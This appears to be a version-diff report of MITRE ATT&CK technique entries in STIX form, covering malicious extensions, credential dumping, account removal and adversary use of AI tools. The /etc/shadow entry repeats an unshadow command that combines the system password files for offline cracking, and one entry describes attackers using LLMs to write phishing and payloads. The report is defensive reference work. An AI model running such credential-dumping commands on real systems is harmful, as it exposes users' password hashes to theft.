Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) | Adversaries may abuse software extensions to establish persistent access to victim systems. Software extensions are modular components that enhance or customize the functionality of software applications, including web browsers, Integrated Development Environments (IDEs), and other platforms.(Citation: Chrome Extension C2 Malware)(Citation: Abramovsky VSCode Security) Extensions are typically installed via official marketplaces, app stores, or manually loaded by users, and they often inherit the permissions and access levels of the host application.
Malicious extensions can be introduced through various methods, including social engineering, compromised marketplaces, or direct installation by users or by adversaries who have already gained access to a system. Malicious extensions can be named similarly or identically to benign extensions in marketplaces. Security mechanisms in extension marketplaces may be insufficient to detect malicious components, allowing adversaries to bypass automated scanners or exploit trust established during the installation process. Adversaries may also abuse benign extensions to achieve their objectives, such as using legitimate functionality to tunnel data or bypass security controls.
The modular nature of extensions and their integration with host applications make them an attractive target for adversaries seeking to exploit trusted software ecosystems. Detection can be challenging due to the inherent trust placed in extensions during installation and their ability to blend into normal application workflows. |
| external_references[1]['source_name'] | Chrome Extension Crypto Miner | Abramovsky VSCode Security |
| external_references[1]['description'] | Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017. | Abramovsky, O. (2023, May 16). VSCode Security: Malicious Extensions Detected- More Than 45,000 Downloads- PII Exposed, and Backdoors Enabled. Retrieved March 30, 2025. |
| external_references[1]['url'] | https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ | https://blog.checkpoint.com/securing-the-cloud/malicious-vscode-extensions-with-more-than-45k-downloads-steal-pii-and-enable-backdoors/ |
| x_mitre_version | 1.3 | 2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_data_sources | | Network Traffic: Network Traffic Flow |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| external_references | {'source_name': 'Chrome Extensions Definition', 'description': 'Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.', 'url': 'https://developer.chrome.com/extensions'} | |
| external_references | {'source_name': 'ICEBRG Chrome Extensions', 'description': 'De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.', 'url': 'https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses'} | |
| external_references | {'source_name': 'Malicious Chrome Extension Numbers', 'description': 'Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.', 'url': 'https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf'} | |
| external_references | {'source_name': 'Catch All Chrome Extension', 'description': 'Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.', 'url': 'https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)'} | |
| external_references | {'source_name': 'Banker Google Chrome Extension Steals Creds', 'description': 'Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.', 'url': 'https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/'} | |
| external_references | {'source_name': 'Browser Adrozek', 'description': 'Microsoft Threat Intelligence. (2020, December 10). Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers. Retrieved February 26, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2020/12/10/widespread-malware-campaign-seeks-to-silently-inject-ads-into-search-results-affects-multiple-browsers/'} | |
| external_references | {'source_name': 'Browers FriarFox', 'description': 'Raggi, Michael. Proofpoint Threat Research Team. (2021, February 25). TA413 Leverages New FriarFox Browser Extension to Target the Gmail Accounts of Global Tibetan Organizations. Retrieved February 26, 2024.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global'} | |
| external_references | {'source_name': 'Stantinko Botnet', 'description': 'Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware campaign operating covertly since 2012. Retrieved November 16, 2017.', 'url': 'https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/'} | |
| external_references | {'source_name': 'Wikipedia Browser Extension', 'description': 'Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.', 'url': 'https://en.wikipedia.org/wiki/Browser_extension'} | |
Minor Version Changes
[T1003.008] OS Credential Dumping: /etc/passwd and /etc/shadow
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may attempt to dump the contents of <code>/etc/p | t | Adversaries may attempt to dump the contents of <code>/etc/p |
| asswd</code> and <code>/etc/shadow</code> to enable offline | | asswd</code> and <code>/etc/shadow</code> to enable offline |
| password cracking. Most modern Linux operating systems use a | | password cracking. Most modern Linux operating systems use a |
| combination of <code>/etc/passwd</code> and <code>/etc/shad | | combination of <code>/etc/passwd</code> and <code>/etc/shad |
| ow</code> to store user account information including passwo | | ow</code> to store user account information, including passw |
| rd hashes in <code>/etc/shadow</code>. By default, <code>/et | | ord hashes in <code>/etc/shadow</code>. By default, <code>/e |
| c/shadow</code> is only readable by the root user.(Citation: | | tc/shadow</code> is only readable by the root user.(Citation |
| Linux Password and Shadow File Formats) The Linux utility, | | : Linux Password and Shadow File Formats) Linux stores user |
| unshadow, can be used to combine the two files in a format | | information such as user ID, group ID, home directory path, |
| suited for password cracking utilities such as John the Ripp | | and login shell in <code>/etc/passwd</code>. A "user" on th |
| er:(Citation: nixCraft - John the Ripper) <code># /usr/bin/u | | e system may belong to a person or a service. All password h |
| nshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</co | | ashes are stored in <code>/etc/shadow</code> - including ent |
| de> | | ries for users with no passwords and users with locked or di |
| | | sabled accounts.(Citation: Linux Password and Shadow File Fo |
| | | rmats) Adversaries may attempt to read or dump the <code>/e |
| | | tc/passwd</code> and <code>/etc/shadow</code> files on Linux |
| | | systems via command line utilities such as the <code>cat</c |
| | | ode> command.(Citation: Arctic Wolf) Additionally, the Linux |
| | | utility <code>unshadow</code> can be used to combine the tw |
| | | o files in a format suited for password cracking utilities s |
| | | uch as John the Ripper - for example, via the command <code> |
| | | /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.passw |
| | | ord.db</code>(Citation: nixCraft - John the Ripper). Since t |
| | | he user information stored in <code>/etc/passwd</code> are l |
| | | inked to the password hashes in <code>/etc/shadow</code>, an |
| | | adversary would need to have access to both. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 20:48:04.491000+00:00 | 2025-04-15 19:59:09.955000+00:00 |
| description | Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db
| Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information, including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
Linux stores user information such as user ID, group ID, home directory path, and login shell in /etc/passwd. A "user" on the system may belong to a person or a service. All password hashes are stored in /etc/shadow - including entries for users with no passwords and users with locked or disabled accounts.(Citation: Linux Password and Shadow File Formats)
Adversaries may attempt to read or dump the /etc/passwd and /etc/shadow files on Linux systems via command line utilities such as the cat command.(Citation: Arctic Wolf) Additionally, the Linux utility unshadow can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db(Citation: nixCraft - John the Ripper). Since the user information stored in /etc/passwd are linked to the password hashes in /etc/shadow, an adversary would need to have access to both. |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Arctic Wolf', 'description': 'Julian Tuin, Stefan Hostetler, Jon Grimm, Aaron Diaz, and Trevor Daher. (2024, November 22). Arctic Wolf Observes Threat Campaign Targeting Palo Alto Networks Firewall Devices. Retrieved January 8, 2025.', 'url': 'https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/'} |
[T1558.004] Steal or Forge Kerberos Tickets: AS-REP Roasting
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Valid domain account'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:32:07.850000+00:00 | 2025-04-15 19:58:23.309000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1548] Abuse Elevation Control Mechanism
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:32:21.811000+00:00 | 2025-04-15 19:58:37.690000+00:00 |
| x_mitre_detection | Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes. | Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes. |
| x_mitre_version | 1.4 | 1.5 |
[T1134] Access Token Manipulation
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Windows User Account Control', 'Heuristic Detection', 'System Access Controls', 'Host Forensic Analysis'] | |
| x_mitre_effective_permissions | ['SYSTEM'] | |
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:47.762000+00:00 | 2025-04-16 20:37:21.869000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.0 | 2.1 |
[T1546.008] Event Triggered Execution: Accessibility Features
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['SYSTEM'] | |
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 12:33:18.602000+00:00 | 2025-04-15 19:58:41.211000+00:00 |
| external_references[2]['description'] | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016. | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html | https://web.archive.org/web/20190216180458/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html |
| external_references[4]['description'] | Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014. | Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 17, 2024. |
| external_references[4]['url'] | http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ | https://web.archive.org/web/20200730053039/https://www.crowdstrike.com/blog/registry-analysis-with-crowdresponse/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1531] Account Access Removal
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
|---|
| t | Adversaries may interrupt availability of system and network | t | Adversaries may interrupt availability of system and network |
| resources by inhibiting access to accounts utilized by legi | | resources by inhibiting access to accounts utilized by legi |
| timate users. Accounts may be deleted, locked, or manipulate | | timate users. Accounts may be deleted, locked, or manipulate |
| d (ex: changed credentials) to remove access to accounts. Ad | | d (ex: changed credentials) to remove access to accounts. Ad |
| versaries may also subsequently log off and/or perform a [Sy | | versaries may also subsequently log off and/or perform a [Sy |
| stem Shutdown/Reboot](https://attack.mitre.org/techniques/T1 | | stem Shutdown/Reboot](https://attack.mitre.org/techniques/T1 |
| 529) to set malicious changes into place.(Citation: CarbonBl | | 529) to set malicious changes into place.(Citation: CarbonBl |
| ack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) In W | | ack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) In W |
| indows, [Net](https://attack.mitre.org/software/S0039) utili | | indows, [Net](https://attack.mitre.org/software/S0039) utili |
| ty, <code>Set-LocalUser</code> and <code>Set-ADAccountPasswo | | ty, <code>Set-LocalUser</code> and <code>Set-ADAccountPasswo |
| rd</code> [PowerShell](https://attack.mitre.org/techniques/T | | rd</code> [PowerShell](https://attack.mitre.org/techniques/T |
| 1059/001) cmdlets may be used by adversaries to modify user | | 1059/001) cmdlets may be used by adversaries to modify user |
| accounts. In Linux, the <code>passwd</code> utility may be u | | accounts. Accounts could also be disabled by Group Policy. I |
| sed to change passwords. Accounts could also be disabled by | | n Linux, the <code>passwd</code> utility may be used to chan |
| Group Policy. Adversaries who use ransomware or similar at | | ge passwords. On ESXi servers, accounts can be removed or mo |
| tacks may first perform this and other Impact behaviors, suc | | dified via esxcli (`system account set`, `system account rem |
| h as [Data Destruction](https://attack.mitre.org/techniques/ | | ove`). Adversaries who use ransomware or similar attacks ma |
| T1485) and [Defacement](https://attack.mitre.org/techniques/ | | y first perform this and other Impact behaviors, such as [Da |
| T1491), in order to impede incident response/recovery before | | ta Destruction](https://attack.mitre.org/techniques/T1485) a |
| completing the [Data Encrypted for Impact](https://attack.m | | nd [Defacement](https://attack.mitre.org/techniques/T1491), |
| itre.org/techniques/T1486) objective. | | in order to impede incident response/recovery before complet |
| | | ing the [Data Encrypted for Impact](https://attack.mitre.org |
| | | /techniques/T1486) objective. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:35:13.577000+00:00 | 2025-04-15 19:58:58.987000+00:00 |
| description | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy.
Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. Accounts could also be disabled by Group Policy. In Linux, the passwd utility may be used to change passwords. On ESXi servers, accounts can be removed or modified via esxcli (`system account set`, `system account remove`).
Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. |
| x_mitre_version | 1.3 | 1.4 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1087] Account Discovery
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:35:28.784000+00:00 | 2025-04-15 19:58:41.600000+00:00 |
| external_references[3]['description'] | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020. | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql | https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql |
| x_mitre_version | 2.5 | 2.6 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1098] Account Manipulation
Current version: 2.8
Version changed from: 2.7 → 2.8
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:35:57.382000+00:00 | 2025-04-15 19:58:54.718000+00:00 |
| x_mitre_version | 2.7 | 2.8 |
| x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1547.014] Boot or Logon Autostart Execution: Active Setup
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 14:17:17.353000+00:00 | 2025-04-15 19:58:13.464000+00:00 |
| external_references[3]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1557] Adversary-in-the-Middle
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-18 14:26:21.852000+00:00 | 2025-04-15 19:58:02.209000+00:00 |
| x_mitre_version | 2.4 | 2.5 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1546.009] Event Triggered Execution: AppCert DLLs
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['Administrator', 'SYSTEM'] | |
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-11-10 18:29:31.052000+00:00 | 2025-04-15 19:58:44.894000+00:00 |
| external_references[3]['description'] | Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017. | Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://forum.sysinternals.com/appcertdlls_topic12546.html | https://web.archive.org/web/20130401232752/https://forum.sysinternals.com/appcertdlls_topic12546.html |
| x_mitre_version | 1.0 | 1.1 |
[T1546.010] Event Triggered Execution: AppInit DLLs
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['Administrator', 'SYSTEM'] | |
| x_mitre_permissions_required | ['Administrator'] | |
| x_mitre_system_requirements | ['Secure boot disabled on systems running Windows 8 and later'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 12:33:45.568000+00:00 | 2025-04-16 20:37:21.193000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1059.002] Command and Scripting Interpreter: AppleScript
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 14:18:20.087000+00:00 | 2025-04-15 19:58:22.484000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1550.001] Use Alternate Authentication Material: Application Access Token
Current version: 1.8
Version changed from: 1.7 → 1.8
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['System Access Controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:38:11.583000+00:00 | 2025-04-15 19:59:20.277000+00:00 |
| x_mitre_version | 1.7 | 1.8 |
[T1071] Application Layer Protocol
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-28 14:10:33.145000+00:00 | 2025-04-15 19:58:21.401000+00:00 |
| x_mitre_version | 2.3 | 2.4 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1546.011] Event Triggered Execution: Application Shimming
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-11-10 18:29:31.094000+00:00 | 2025-04-15 19:58:26.274000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1588.007] Obtain Capabilities: Artificial Intelligence
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may obtain access to generative artificial intel | t | Adversaries may obtain access to generative artificial intel |
| ligence tools, such as large language models (LLMs), to aid | | ligence tools, such as large language models (LLMs), to aid |
| various techniques during targeting. These tools may be used | | various techniques during targeting. These tools may be used |
| to inform, bolster, and enable a variety of malicious tasks | | to inform, bolster, and enable a variety of malicious tasks |
| including conducting [Reconnaissance](https://attack.mitre. | | , including conducting [Reconnaissance](https://attack.mitre |
| org/tactics/TA0043), creating basic scripts, assisting socia | | .org/tactics/TA0043), creating basic scripts, assisting soci |
| l engineering, and even developing payloads.(Citation: MSFT- | | al engineering, and even developing payloads.(Citation: MSFT |
| AI) For example, by utilizing a publicly available LLM an a | | -AI) For example, by utilizing a publicly available LLM an |
| dversary is essentially outsourcing or automating certain ta | | adversary is essentially outsourcing or automating certain |
| sks to the tool. Using AI, the adversary may draft and gener | | tasks to the tool. Using AI, the adversary may draft and gen |
| ate content in a variety of written languages to be used in | | erate content in a variety of written languages to be used i |
| [Phishing](https://attack.mitre.org/techniques/T1566)/[Phish | | n [Phishing](https://attack.mitre.org/techniques/T1566)/[Phi |
| ing for Information](https://attack.mitre.org/techniques/T15 | | shing for Information](https://attack.mitre.org/techniques/T |
| 98) campaigns. The same publicly available tool may further | | 1598) campaigns. The same publicly available tool may furthe |
| enable vulnerability or other offensive research supporting | | r enable vulnerability or other offensive research supportin |
| [Develop Capabilities](https://attack.mitre.org/techniques/T | | g [Develop Capabilities](https://attack.mitre.org/techniques |
| 1587). AI tools may also automate technical tasks by generat | | /T1587). AI tools may also automate technical tasks by gener |
| ing, refining, or otherwise enhancing (e.g., [Obfuscated Fil | | ating, refining, or otherwise enhancing (e.g., [Obfuscated F |
| es or Information](https://attack.mitre.org/techniques/T1027 | | iles or Information](https://attack.mitre.org/techniques/T10 |
| )) malicious scripts and payloads.(Citation: OpenAI-CTI) | | 27)) malicious scripts and payloads.(Citation: OpenAI-CTI) F |
| | | inally, AI-generated text, images, audio, and video may be u |
| | | sed for fraud, [Impersonation](https://attack.mitre.org/tech |
| | | niques/T1656), and other malicious activities.(Citation: Goo |
| | | gle-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI2 |
| | | 4) |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | ['Menachem Goldstein'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:18:36.583000+00:00 | 2025-04-15 19:58:05.447000+00:00 |
| description | Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)
| Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)
|
| x_mitre_detection | | Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of generative artificial intelligence (i.e. [Phishing](https://attack.mitre.org/techniques/T1566), [Phishing for Information](https://attack.mitre.org/techniques/T1598)). |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
